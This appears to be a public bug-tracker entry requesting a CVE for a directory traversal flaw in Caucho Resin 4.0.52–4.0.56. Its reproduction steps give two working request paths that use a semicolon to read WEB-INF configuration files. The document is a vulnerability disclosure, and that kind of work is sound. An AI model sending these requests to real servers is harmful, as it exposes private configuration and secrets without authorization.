Viewing Issue Advanced Details
[ Jump to Notes ]
|
[ View Simple ]
[ Issue History ]
[ Print ]
|
ID |
Category |
Severity |
Reproducibility |
Date Submitted |
Last Update |
0006448 |
[Resin] |
major |
always |
11-21-21 02:23 |
08-29-23 19:52 |
|
Reporter |
liulangmao |
View Status |
public |
|
Assigned To |
|
Priority |
normal |
Resolution |
open |
Platform |
|
Status |
new |
|
OS |
|
Projection |
none |
|
OS Version |
|
ETA |
none |
Fixed in Version |
|
Product Version |
|
|
Product Build |
|
|
Summary |
0006448: CVE ID Request |
Description |
Directory traversal vulnerability in Caucho Resin, as distributed in Resin V4.0.52~4.0.56, allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request. |
Steps To Reproduce |
> [Attack Vectors]
> http://localhost/resin-doc/;/WEB-INF/resin-web.xml [^] or http://localhost/webapp-name/;/WEB-INF/web.xml [^] |
Additional Information |
|
|
Attached Files |
1b4438dfb8f690cb7eadcd0d0d085816.png [^] (190,723 bytes) 11-21-21 02:23 |
|